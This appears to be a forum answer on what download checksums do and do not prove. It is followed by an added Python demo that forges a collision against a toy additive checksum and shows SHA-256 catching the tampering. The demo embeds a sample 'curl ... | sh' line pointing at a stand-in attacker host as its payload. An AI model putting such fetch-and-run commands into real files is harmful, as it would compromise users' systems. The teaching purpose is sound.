It only verifies that the contents of the file you end up with on your hard drive are the same as the file the publisher used to create the checksum. You still can’t trust the file any more than you trust the publisher.
Also, there is such a thing as hash collisions. Basically this means that multiple different files can lead to the same checksum. You can add a nefarious payload to a file and then modify or pad the remainder of the file so that the resulting checksum is the same. It’s pretty difficult to do, but it’s definitely feasible.
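As an added illustration (not part of the answer above or of any real download), the script below shows the two points in working code: a checksum only ties your bytes to the value the publisher posted, and the "append a payload, then pad until the checksum matches" trick works against a weak additive checksum but not against a cryptographic hash like SHA-256, for which no practical way to do this is known. The file contents, the payload and the `weak_sum16` checksum are constructed for the example; `verify` and `forge_weak_collision` are hypothetical helper names.

```python
import hashlib
import hmac

# Constructed sample "download" and a constructed attacker addition (not real files).
ORIGINAL = b"#!/bin/sh\necho 'installing tool'\n"
PAYLOAD = b"curl -s http://attacker.invalid/x | sh\n"  # hypothetical malicious line


def weak_sum16(data: bytes) -> int:
    """Deliberately weak checksum: sum of all bytes modulo 2**16.
    Stands in for the kind of linear checksum an attacker can steer with padding."""
    return sum(data) & 0xFFFF


def sha256_hex(data: bytes) -> str:
    """The strong checksum a publisher would normally post (SHA-256, hex)."""
    return hashlib.sha256(data).hexdigest()


def verify(data: bytes, published_hex: str) -> bool:
    """Integrity check: do our bytes hash to the value the publisher posted?
    This proves nothing about whether the publisher's file was safe to begin with.
    compare_digest is used so the comparison does not leak timing information."""
    return hmac.compare_digest(sha256_hex(data), published_hex)


def forge_weak_collision(original: bytes, payload: bytes) -> bytes:
    """Append a payload, then pad so weak_sum16 of the result equals weak_sum16(original).
    The padding sits after a '#' so a shell would treat it as a comment (constructed detail).
    Because the checksum is additive, the attacker just needs padding bytes whose sum
    cancels the payload's contribution modulo 2**16."""
    target = weak_sum16(original)
    tampered = original + payload + b"#"
    deficit = (target - weak_sum16(tampered)) & 0xFFFF
    # Bytes of 0xFF each add 255; one final byte supplies the remainder.
    padding = bytes([0xFF] * (deficit // 255) + [deficit % 255])
    forged = tampered + padding + b"\n"  # the trailing newline adds 10 ...
    # ... so compensate for it before returning: recompute with the newline included.
    deficit = (target - weak_sum16(forged)) & 0xFFFF
    if deficit:
        forged += bytes([0xFF] * (deficit // 255) + [deficit % 255])
    return forged


def demo() -> dict:
    """Run the scenario and return what each check says."""
    published = sha256_hex(ORIGINAL)          # what the publisher posts next to the download
    forged = forge_weak_collision(ORIGINAL, PAYLOAD)
    return {
        "weak_checksum_matches": weak_sum16(forged) == weak_sum16(ORIGINAL),
        "sha256_original_ok": verify(ORIGINAL, published),
        "sha256_forged_ok": verify(forged, published),
        "payload_present": PAYLOAD in forged,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The weak checksum is fooled every time because it is linear in the input, so the attacker can solve for the padding directly; the SHA-256 check fails on the same tampered bytes. Either way, a matching checksum only says you got the publisher's bytes unchanged.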